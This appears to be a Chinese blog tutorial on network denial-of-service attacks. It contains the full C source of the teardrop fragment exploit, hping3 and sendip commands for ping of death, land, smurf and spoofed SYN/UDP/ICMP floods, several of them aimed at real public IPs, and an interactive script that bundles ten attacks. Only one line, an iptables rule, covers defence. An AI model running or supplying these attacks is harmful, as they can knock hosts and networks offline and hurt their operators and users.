文章目录
一、teardrop
将碎片数据包发送到目标机器。由于接收这些数据包的机器由于TCP / IP碎片重组错误而无法重新组装,因此数据包相互重叠,导致目标网络设备崩溃
代码实现
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <errno.h>
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n) (n)
#else
/* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */
#define IP_MF 0x2000 /* More IP fragment en route */
#define IPH 0x14 /* IP header size */
#define UDPH 0x8 /* UDP header size */
#define PADDING 0x1c /* datagram frame padding for first packet */
#define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 */
#define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can
* withstand maybe 5 or 10 sometimes... Experiment.*/
void usage(u_char *);
u_long name_resolve(u_char *);
void send_frags(int, u_long, u_long, u_short, u_short);
int main(int argc, char **argv)
{
int one = 1, count = 0, i, rip_sock;
// 定义源地址和目的地址
u_long src_ip = 0, dst_ip = 0;
// 定义源端口和目的端口
u_short src_prt = 0, dst_prt = 0;
// 定义一个32位的IPv4地址
struct in_addr addr;
printf("teardrop route|daemon9\n\n");
//创建原始套接字
if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
fprintf(stderr, "raw socket");
exit(1);
}
//设置套接字选项IP_HDRINCL
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL,
(char *)&one, sizeof(one))< 0)
{
fprintf(stderr, "IP_HDRINCL");
exit(1);
}
if (argc < 3)
usage(argv[0]);
// 设置源IP 和 目的IP
if(!(src_ip=name_resolve(argv[1]))||!(dst_ip = name_resolve(argv[2])))
{
fprintf(stderr, "What the hell kind of IP address is that?\n");
exit(1);
}
while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
{
switch (i)
{
case 's': // source port (should be emphemeral)
src_prt = (u_short)atoi(optarg);
break;
case 't': // dest port (DNS, anyone?)
dst_prt = (u_short)atoi(optarg);
break;
case 'n': // number to send
count = atoi(optarg);
break;
default :
usage(argv[0]);
break; // NOTREACHED
}
}
srandom((unsigned)(utimes("0",(time_t)0)));
if (!src_prt) src_prt = (random() % 0xffff);
if (!dst_prt) dst_prt = (random() % 0xffff);
if (!count)
count = COUNT;
printf("Death on flaxen wings:\n");
addr.s_addr = src_ip;
printf("From: %15s.%5d\n", inet_ntoa(addr), src_prt);
addr.s_addr = dst_ip;
printf(" To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
printf(" Amt: %5d\n", count);
printf("[\n ");
for (i = 0; i < count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
// printf("b00m ");
usleep(500);
}
printf("]\n");
return (0);
}
// 设置 IP 包的内容
void send_frags(int sock, u_long src_ip, u_long dst_ip,u_short src_prt,u_short dst_prt)
{
u_char *packet = NULL, *p_ptr = NULL, *flag = NULL; // packet pointers
u_char byte; // a byte
// 套接字地址结构
struct sockaddr_in sin; /* socket protocol structure */
sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.s_addr = dst_ip;
packet = (u_char *)malloc(IPH + UDPH + PADDING);
p_ptr = packet;
flag = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
// IP version and header length
byte = 0x45;
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; // IP TOS (skipped)
// total length
*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); // IP id
p_ptr += 2;
//IP frag flags and offset
*((u_short *)p_ptr) |= FIX(IP_MF);
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; // IP TTL
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
// IP checksum filled in by kernel
p_ptr += 4;
// IP source address
*((u_long *)p_ptr) = src_ip;
p_ptr += 4;
// IP destination address
*((u_long *)p_ptr) = dst_ip;
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); // UDP source port
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); // UDP destination port
p_ptr += 2;
*((u_short *)p_ptr) = htons(PADDING); // UDP total length
p_ptr += 4;
// 发送数据:Fake News
*((u_short *)p_ptr) = 0x46;
p_ptr++;
*((u_short *)p_ptr) = 0x61;
p_ptr++;
*((u_short *)p_ptr) = 0x6B;
p_ptr++;
*((u_short *)p_ptr) = 0x65;
p_ptr++;
*((u_short *)p_ptr) = 0x20;
p_ptr++;
*((u_short *)p_ptr) = 0x4E;
p_ptr++;
*((u_short *)p_ptr) = 0x65;
p_ptr++;
*((u_short *)p_ptr) = 0x77;
p_ptr++;
*((u_short *)p_ptr) = 0x73;
int i=1;
while(i <= 56)
{
printf("%x\t",*flag);
flag++;
if(0 == i%8)
printf("\n");
i++;
}
if (sendto(sock, packet, IPH + UDPH + PADDING, 0,
(struct sockaddr *)&sin,sizeof(struct sockaddr)) == -1)
{
fprintf(stderr, "\nsendto");
free(packet);
exit(1);
}
// IP total length is 2 bytes into the header
p_ptr = &packet[2];
*((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
// IP offset is 6 bytes into the header
p_ptr += 4;
*((u_short *)p_ptr) = FIX(MAGIC);
if (sendto(sock, packet, IPH+MAGIC+1, 0,
(struct sockaddr *)&sin,sizeof(struct sockaddr)) == -1)
{
fprintf(stderr, "\nsendto");
free(packet);
exit(1);
}
free(packet);
}
// 获取主机信息
u_long name_resolve(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;
if ((addr.s_addr = inet_addr(host_name)) == -1)
{
if (!(host_ent = gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
}
return (addr.s_addr);
}
void usage(u_char *name)
{
fprintf(stderr, "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",name);
exit(0);
}
二、tcp flag 异常攻击
同时对flag中的多个标志进行置为操作
使用ipop工具中的tcp,四个选项都勾选,可以构造tcp flag异常报文
三、ping
发送icmp分片包,可以用下面的命令
ing -f -s 65507 114.114.114.114
65507是包的长度
四、icmp重定向和icmp不可达
icmp重定向:
伪装成主机默认网关发送icmp重定向报文到主机,让主机更改路由表信息,从而达到攻击的目的
ubuntu下使用netwox工具,命令如下:
netwox 86 -f “host 192.168.1.17” -g “192.168.1.19” -i 192.168.1.1
-f 被攻击主机
-g 重定向包需要被攻击者修改的新路由
-i 被攻击者原来的路由
icmp不可达攻击
netwox 82 -f “host 192.168.1.17” -i “192.168.1.1”
-f 被攻击者
-i 被攻击者当前的路由
五、带源路由选项的ip报文攻击
通过在ip选项中添加合法的ip地址,蒙混进入网络,进行攻击;
六、tcp-syn分片
如下脚本和命令结合
root@ubuntu:/home/wjq#
export a=6798;
while true;do ./syn_frag.sh 192.168.2.107 $a 14.215.178.78 80 192.168.2.1;let a++;done;^C
root@ubuntu:/home/wjq# cat syn_frag.sh
#!/bin/sh
sendip -v -p ipv4 -is $1 -id $3 -ifm 1 -p tcp -ts $2 -td $4 -tfs 1 $5
sendip -v -p ipv4 -is $1 -id $3 -ifm 1 -p tcp -ts $2 -td $4 -tfs 1 $5
sendip -v -p ipv4 -is $1 -id $3 -ifm 1 -p tcp -ts $2 -td $4 -tfs 1 $5
sendip -v -p ipv4 -is $1 -id $3 -ifm 0 -p tcp -ts $2 -td $4 -tfs 1 $5
七、带数据的tcp-syn攻击
用如下脚本可以构造出包
root@ubuntu:/home/wjq# ./tcp_sys_data.sh 192.168.2.107 $a 14.215.178.78 80 192.168.2.1^C
root@ubuntu:/home/wjq# cat tcp_sys_data.sh
#!/bin/sh
sendip -v -p ipv4 -is $1 -id $3 -p tcp -ts $2 -td $3 -tfs 1 -d 0xcdcdcdcdcd $5
八、死亡之ping
ping -f -s 65507 114.114.114.114
九、攻击验证方法
九.1 land攻击
使用linux下的hping3工具可以达到攻击效果,命令如下:
tcp
hping3 -S -p 80 14.215.178.78 -a 14.215.178.78 --flood
– -S tcp-syn
– -p 80 目标端口
– 14.215.178.78 攻击的目标ip
– -a 14.215.178.78 伪装成目标ip
– --flood 以泛洪方式发送
tcp-syn-land
root@ubuntu:/home/sfg# cat tcp_syn_land.sh
#!/bin/bash
function tcp_syn_land()
{
local victim_ip=$1
local victim_port=$2
hping3 -S ${victim_ip} -p ${victim_port} -a ${victim_ip} --flood
}
tcp_syn_land $*
udp-land
hping3 -2 -p 80 14.215.178.78 -a 14.215.178.78 --flood
– -2 表示udp,默认是tcp
icmp
root@ubuntu:/home/wjq# while true;do sendip -v -p ipv4 -is 14.215.178.78 -id 14.215.178.78 -p icmp -d $b 192.168.68.1;let b+=1;done;
root@ubuntu:/home/wjq# echo $b
56249
九.2 flood攻击
tcp泛洪攻击
hping3 -S --rand-source 14.215.178.78 --flood
icmp泛洪
hping3 -1 --rand-source 14.215.178.78 --flood
udp泛洪
hping3 -2 --rand-source 14.215.178.78 --flood
tcp-syn flood
hping3 -S -p 80 --rand-source 14.215.178.78 --flood
tcp-syn分片
hping3 -c 5 -S -p 80 -x -a 192.167.45.67 14.215.178.78;hping3 -c 1 -S -p 80 -a 192.167.45.67 14.215.178.78
icmp flood
hping3 -1 --rand-source 14.215.178.78 --flood
死亡之ping
root@ubuntu:/home/sfg# cat ping_of_death.sh
#!/bin/bash
function ping_of_death()
{
local victim_ip=$1
local id=186
local data_size=1450
let icmp_size=${data_size}+8
hping3 --icmp ${victim_ip} --data ${data_size} --id ${id} --count 1 --morefrag
for i in $(seq 50)
do
let offset=${i}*${icmp_size}
hping3 --icmp ${victim_ip} --data ${data_size} --id ${id} --count 1 --morefrag --fragoff $offset
done
}
ping_of_death $*
smurf
root@ubuntu:/home/sfg# cat smurf.sh
#!/bin/bash
function smurf()
{
local victim_ip=$1
local broadcast_ip=$2
hping3 --icmp ${broadcast_ip} -a ${victim_ip} --flood
}
smurf $*
teardrop
root@ubuntu:/home/sfg# cat teardrop.sh
#!/bin/bash
function icmp_teardrop()
{
local dst_ip=$1
local id=186
hping3 --icmp ${dst_ip} --data 1480 --id ${id} --count 1 --morefrag
hping3 --icmp ${dst_ip} --data 1480 --id ${id} --count 1 --morefrag --fragoff 240
hping3 --icmp ${dst_ip} --data 648 --id ${id} --count 1 --fragoff 18960
}
icmp_teardrop $*
tcp-syn分片
root@ubuntu:/home/sfg# cat tcp_syn_frag.sh
#!/bin/bash
function tcp_syn_frag()
{
local dst_ip=$1
hping3 -S ${dst_ip} --morefrag --count 1 -S -U --destport 80 --data 1480 --rand-source
hping3 -S ${dst_ip} --morefrag --fragoff 1480 --count 1 -S -U --destport 80 --data 140 --rand-source
hping3 -S ${dst_ip} --fragoff 2960 --count 1 -S -U --destport 80 --data 140 --rand-source
}
tcp_syn_frag $*
攻击脚本
#!/bin/bash
function tcp_syn_frag()
{
echo "Welcome tcp_syn_frag"
echo "enter attack target ip:"
read dest_ip
echo "enter attack target port:"
read dest_port
#local dest_ip=$1
hping3 -S ${dest_ip} --morefrag --count 1 -S -U --destport ${dest_port} --data 1480 --rand-source
hping3 -S ${dest_ip} --morefrag --fragoff 1480 --count 1 -S -U --destport ${dest_port} --data 140 --rand-source
hping3 -S ${dest_ip} --fragoff 2960 --count 1 -S -U --destport ${dest_port} --data 140 --rand-source
}
function icmp_teardrop()
{
echo "Welcome icmp_teardrop"
echo "enter tattck target ip:"
read dest_ip
local id=186
hping3 --icmp ${dest_ip} --data 1480 --id ${id} --count 1 --morefrag
hping3 --icmp ${dest_ip} --data 1480 --id ${id} --count 1 --morefrag --fragoff 240
hping3 --icmp ${dest_ip} --data 648 --id ${id} --count 1 --fragoff 18960
}
function icmp_smurf()
{
echo "Welcome icmp_smurf"
echo "enter attack target ip:"
read dest_ip
echo "enter attack target broadcast ip"
read broadcast_ip
hping3 --icmp ${broadcast_ip} -a ${dest_ip} --flood
}
function ping_of_death()
{
echo "Welcome ping_of_death"
echo "enter aattack target ip:"
read dest_ip
local id=186
local data_size=1450
let icmp_size=${data_size}+8
hping3 --icmp ${dest_ip} --data ${data_size} --id ${id} --count 1 --morefrag
for i in $(seq 50)
do
let offset=${i}*${icmp_size}
hping3 --icmp ${dest_ip} --data ${data_size} --id ${id} --count 1 --morefrag --fragoff $offset
done
}
function tcp_syn_flood()
{
echo "Welcome tcp_syn_flood"
echo "enter attack target ip:"
read dest_ip
echo "enter attack target port:"
read dest_port
hping3 -S -p ${dest_port} --rand-source ${dest_ip} --flood
}
function udp_flood()
{
echo "Welcome udp_flood"
echo "enter attack tartget ip:"
read dest_ip
hping3 -2 --rand-source ${dest_ip} --flood
}
function icmp_flood()
{
echo "Welcome icmp_flood"
echo "enter attack target ip:"
read dest_ip
hping3 -1 --rand-source ${dest_ip} --flood
}
function tcp_flood()
{
echo "Welcome tcp_flood"
echo "enter attack target ip:"
read dest_ip
hping3 -S --rand-source ${dest_ip} --flood
}
function tcp_syn_land()
{
echo "Welcome tcp_syn_land"
echo "enter attack target ip:"
read dest_ip
echo "enter attack target port:"
read dest_port
hping3 -S -p ${dest_port} ${dest_ip} -a ${dest_ip} --flood
}
function udp_land()
{
echo "Welcome udp_land"
echo "enter attack target ip:"
read dest_ip
echo "enter attack target port:"
read dest_port
hping3 -2 -p ${dest_port} ${dest_ip} -a ${dest_ip} --flood
}
usage()
{
echo $1
echo "Usage:"
echo " ./test_script.sh [one of Support attack lists]"
echo "Support attack lists:"
echo " 1 tcp_syn_frag"
echo " 2 icmp_teardrop"
echo " 3 icmp smurf"
echo " 4 ping_of_death"
echo " 5 tcp_syn_flood"
echo " 6 udp_flood"
echo " 7 icmp_flood"
echo " 8 tcp_flood"
echo " 9 tcp_syn_land"
echo " 10 udp_land"
echo "selcet:"
read secect
handle ${secect}
}
function handle()
{
case $1 in
"-h")
usage $*
;;
"1")
tcp_syn_frag
;;
"2")
icmp_teardrop
;;
"3")
icmp_smurf
;;
"4")
ping_of_death
;;
"5")
tcp_syn_flood
;;
"6")
udp_flood
;;
"7")
icmp_flood
;;
"8")
tcp_flood
;;
"9")
tcp_syn_land
;;
"10")
udp_land
;;
*)
usage
;;
esac
}
handle $*
tcp类防御方法
限制目的ip的连接数量最大为5个
iptables -I FORWARD -p tcp --syn --dport 80 -m connlimit --connlimit-above 5 --connlimit-daddr -j DROP